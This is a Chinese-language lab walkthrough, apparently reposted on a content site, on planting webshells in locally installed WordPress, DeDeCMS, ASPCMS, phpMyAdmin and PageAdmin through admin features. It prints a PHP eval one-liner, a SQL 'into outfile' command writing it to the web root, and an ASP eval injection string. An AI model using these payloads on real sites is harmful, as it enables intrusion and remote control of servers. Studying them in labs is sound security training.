一、wordpress

安装环境

首先我们在vulhub中启动我们wordpress的doaker容器

然后去访问我们的80端口

然后选择简体中文进行安装

然后就可以登录到我们的后台界面了

后台修改模板拿webshell

进入后台,我们修改一下404页面的代码,添加我们的一句话木马

然后保存,拼接路径去访问一下404.php页面看一下有没有解析我们的php语言

/wp-content/themes/twentyfifteen/404.php

 可以看到我们的木马被成功解析,接下来只需要蚁剑连接即可

上传主题拿webshell

首先我们先去主题网站上下载一套主题,要注意大小不要太大

然后将我们的一句话木马添加到这个压缩包中

然后将这个主题上传

可以看到上传成功

然后按照上个方法拼接路径即可

然后就可以使用蚁剑连接了

二、DeDeCMS

首先安装好我们的DeDeCMS,找一个压缩包解压到网站根目录即可

访问我们的网站,按照步骤教程安装即可

通过文件管理器拿webshell

登录后台管理界面后选择模块--文件管理器上传我们的木马文件

<?php phpinfo();@eval($_POST[cmd]);?>

可以看到上传成功

访问我们的一句话木马,可以看到上传成功

蚁剑连接即可

修改模板文件拿webshell

按照图示内容修改index.htm文件的内容

在文件内容开头加上我们的一句话木马

然后去修改,这个位置的内容

修改为,图示内容并保存

可以看到我们的木马已经被解析生效了,接下来只需要蚁剑连接即可

后台任意命令执行拿webshell

首先来到图片位置,添加一个广告

广告内容写上我们的一句话木马,点击确定保存

回到广告管理页面,点击代码,即可看到我们广告的路径拼接即可

查看页面源代码即可看到我们的一句话木马已经被解析了

使用菜刀进行连接即可

后台SQL命令执行拿webshell

找到图示位置

在这里我们可以利用into outfile来写入一句话木马

select '<?php phpinfo();@eval($_POST[cmd]);?>' into outfile 'E:/phpstudy_pro/WWW/1.php'

然后去访问我们上传的路径,报错的注意要修改一下my.ini中的配置文件

可以看到我们的一句话木马被解析了,然后蚁剑连接即可

三、ASPCMS

这次我们需要在iis中进行安装

找到我们iis的根目录,将我的ASPCMS压缩包解压到根目录即可

然后按照步骤进行安装,安装好后访问我们的后台,注意后台的路径,然后登录即可

后台修改配置文件拿webshell

按照图示找到位置

然后我们点击保存进行抓包

修改一下图中所示字段

修改为

1%25><%25Eval(Request (chr(65)))%25><%25

然后就可以根据以下地址进行菜刀连接

可以看到连接成功

四、PhPMyadmin

首先我们在小皮面板中安装一个PhPMyadmin

然后去访问,登录

通过日志拿webshell 

首先,点击变量然后搜索gen

然后将图中所示的两个值修改为,这样就可以将日志写入我门根目录下的1.php文件中

然后按照图示写一句话木马,点击执行

然后去访问我们的1.php,可以看到我们的一句话木马已经被解析了,接下来蚁剑访问即可

 导入导出拿webshell

在sql命令执行栏中输入,即看到数据库的地址,这样我们可以判断网站根目录的地址在哪

然后运用into outfile将我们的一句话木马写入网站的根目录中

然后去访问我们的2.php,可以看到一句话木马被解析,然后蚁剑连接即可

五、Pageadmin

仿照上面的步骤解压到根目录即可,注意这关需要使用的是sqlserver数据库,需要安装到iis中,选择存在的数据库名字

安装好登录即可

上传文件解压拿webshell

注意这里要上传的是压缩包,我们需要将我们的一句话木马添加到压缩包中

上传之后解压即可

然后去访问我们的1.asp

使用蚁剑连接即可

上传模块拿webshell

按照图示即可上传我们的木马文件的压缩包,但是这里需要授权

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如若转载,请注明出处:http://www.pswp.cn/pingmian/91257.shtml
繁体地址,请注明出处:http://hk.pswp.cn/pingmian/91257.shtml
英文地址,请注明出处:http://en.pswp.cn/pingmian/91257.shtml

如若内容造成侵权/违法违规/事实不符,请联系英文站点网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

指针的运算与数组

一、指针的运算1.1加法对指针可以进行加法运算&#xff0c;即p n或者p - n。其结果依旧是一个是一个指针&#xff0c;新的指针是在原来的地址值基础上加上/减去n *(sizeof(指针指向的数据类型)&#xff09;个字节。 指针也可以进行自增&#xff0c;即*&#xff08;p &#xf…

【PostgreSQL内核学习:WindowAgg 帧优化与节点去重】

PostgreSQL内核学习&#xff1a;WindowAgg 帧优化与节点去重背景关键词解释本优化主要修改内容描述提交信息提交描述源码解读optimize_window_clauses 函数核心逻辑拆解函数时序图新增结构体类型 SupportRequestOptimizeWindowClause优化后的效果帧优化 sql 用例查询计划输出节…

行业要闻|正式落地!新思科技宣布完成对Ansys的收购

2025年7月17日——新思科技&#xff08;Synopsys, Inc.&#xff0c;纳斯达克股票代码&#xff1a;SNPS&#xff09;宣布完成对Ansys的收购。该交易旨在整合芯片设计、IP核以及仿真与分析领域的领先企业&#xff0c;助力开发者快速创新AI驱动的产品。在扩大至310亿美元的总潜在市…

Elasticsearch 基础速成 5 步跑通索引、文档、映射与查询

1 准备工作运行环境 curl -fsSL https://elastic.co/start-local | sh # 一条命令拉起本地单节点集群 # 浏览器打开 http://localhost:5601 进入 Kibana → DevTools → Console已有云端或 Serverless 集群可以直接跳到第 2 步。操作界面 以下所有请求均可在 Kibana → DevT…

语音表示学习论文总结

语音表示学习&#xff08;Speech Representation Learning&#xff09;是语音信号处理与机器学习交叉领域的核心技术&#xff0c;其目标是通过数据驱动的方式&#xff0c;从原始语音信号中自动提取具有判别性、鲁棒性和泛化能力的特征表示&#xff0c;以替代传统手工设计的声学…

国产芯+单北斗防爆终端:W5-D防爆智能手机,助力工业安全通信升级

在石油石化、煤矿开采、电力检修等高危行业&#xff0c;防爆设备的定位精度、通信可靠性及供应链安全性直接决定作业安全与生产效率。传统防爆手机依赖GPS定位与进口芯片&#xff0c;存在信号盲区、数据泄露风险及断供隐患。针对此&#xff0c;我们推出W5-D防爆智能终端&#x…

Kafka简述及学习课程

Kafka是由Apache软件基金会开发的一个开源流处理平台&#xff0c;由Scala和Java编写。Kafka是一种高吞吐量的分布式发布订阅消息系统&#xff0c;它可以处理消费者在网站中的所有动作流数据。 这种动作&#xff08;网页浏览&#xff0c;搜索和其他用户的行动&#xff09;是在现…

BLE PHY 帧结构

BLE&#xff08;低功耗蓝牙&#xff09;的 PHY&#xff08;物理层&#xff09;帧结构根据传输模式&#xff08;广播、数据&#xff09;和 PHY 类型&#xff08;1M、2M、Coded PHY&#xff09;有所差异&#xff0c;但基本框架一致。以下是 BLE PHY 帧的通用结构及各部分含义&…

海外货运 app 系统架构分析

一、引言海外货运业务涉及众多复杂环节&#xff0c;从货物揽收、仓储管理、运输调度到最后交付&#xff0c;需要一个高效、稳定且功能全面的 APP 系统来协调各方资源&#xff0c;提升物流效率&#xff0c;保障货物安全准确送达。本文将对海外货运 APP 系统架构进行详细剖析&…

【硬件-笔试面试题】硬件/电子工程师,笔试面试题-52,(知识点:简单一阶低通滤波器的设计,RC滤波电路,截止频率)

目录 1、题目 2、解答 3、相关知识点 一、一阶低通滤波器的核心原理 1. 电路结构 2. 关键特性参数 二、一阶低通滤波器的设计步骤&#xff08;以 RC 电路为例&#xff09; 1. 确定截止频率\(f_c\) 2. 选择电阻 R 的阻值 3. 计算电容 C 的容值 4. 验证与调整 三、典…

防火墙安全实验

一、实验拓补图二、实验需求1、VLAN 2属于办公区;VLAN 3属于生产区2、办公区PC在工作日时间(周一至周五&#xff0c;早8到晚6)可以正常访OA Server&#xff0c;其他时间不允许3、办公区PC可以在任意时刻访问Web server4、生产区PC可以在任意时刻访问OA Server&#xff0c;但是不…

TOC-Transformer-LSTM-ABKDE,计算机一区算法龙卷风优化算法应用到概率区间预测!Matlab实现

TOC算法概述 文献《Tornado optimizer with Coriolis force: a novel bio-inspired meta-heuristic algorithm》核心解读&#xff1a;科里奥利力的龙卷风优化算法&#xff08;Tornado optimizer with Coriolis force&#xff0c;TOC&#xff09;对龙卷风循环过程的观察以及雷暴…

Adobe Illustrator安装下载教程(附安装包)Illustrator2025

文章目录一、Illustrator2025 下载链接二、Illustrator2025 安装步骤三、Illustrator 2025 软件介绍一、Illustrator2025 下载链接 夸克下载链接&#xff1a;https://pan.quark.cn/s/b990bac7107c 二、Illustrator2025 安装步骤 1.将安装包下载并解压&#xff0c;双击打开&am…

matlab - 算4个数的加减法

文章目录matlab - 算4个数的加减法概述笔记ENDmatlab - 算4个数的加减法 概述 有个类似于下面的4个数的加减法&#xff0c;给出任意一组解就行。 反正都是遍历, c可以&#xff0c;matlab也可以。 笔记 % file test.m % brief 用matlab来算"4个数的加减法" %a b…

C++ 1.面向对象编程(OOP)框架

目录 面向对象编程(OOP)框架 问题背景 OOP框架开发的关键问题解析 步骤1&#xff1a;抽象设计阶段 步骤2&#xff1a;继承层次设计 步骤3&#xff1a;多态机制应用 步骤4&#xff1a;对象关系管理 这个案例展现的核心OOP价值 封装的价值 继承的价值 多态的价值 实际…

mac操作笔记

mac的操作笔记opt文件夹是干什么的&#xff1f;如何在某个访达的文件夹里快速打开终端opt文件夹是干什么的&#xff1f; 在 macOS 中&#xff0c;/opt 目录是一个可选&#xff08;optional&#xff09;软件安装目录&#xff0c;主要用于存放第三方或非系统原生的应用程序。 /…

红黑树×协程×内存序:2025 C++后端核心三体问题攻防手册

以下是2025年C后端开发全新高频压轴面试题&#xff0c;结合腾讯、字节、阿里等大厂最新技术栈&#xff0c;聚焦红黑树工程实践、C20协程底层、Linux内核同步、分布式锁实现及内存序重排五大核心领域&#xff0c;附工业级解决方案和手撕代码示例&#xff1a; &#x1f333; 一、…

《人工智能导论》(python版)第2章 python基础2.2编程基础

书写这篇博客的目的在于实践并记录《人工智能导论》&#xff08;Pyhton版&#xff09;微课视频版这本书的内容&#xff0c;便于对人工智能有更深层次的理解。 参考文献&#xff1a;姜春茂.人工智能导论&#xff08;Python版&#xff09;微课视频版[M]. 北京:清华大学出版社,20…

高可用部署

一.keeplivaer nginx 高可用部署 下面为你详细介绍基于 Keepalived 和 Nginx 在两台机器&#xff08;192.168.137.132 和 192.168.137.61&#xff09;上实现高可用部署的完整步骤&#xff1a; 一、环境准备&#xff08;两台服务器均执行&#xff09;环境准备 &#xff08;1&…

java面向对象高级02——单例类(设计模式)

1.什么是设计模式&#xff1f;一个问题可以有多种解法&#xff0c;在众多解法的最优解法、方案就是设计模式。我们关注的点&#xff1a;某一种设计模式解决的是啥问题&#xff1f;这一设计模式怎么写&#xff1f;2.单例设计模式a.作用单例设计模式的核心作用是确保一个类只有一…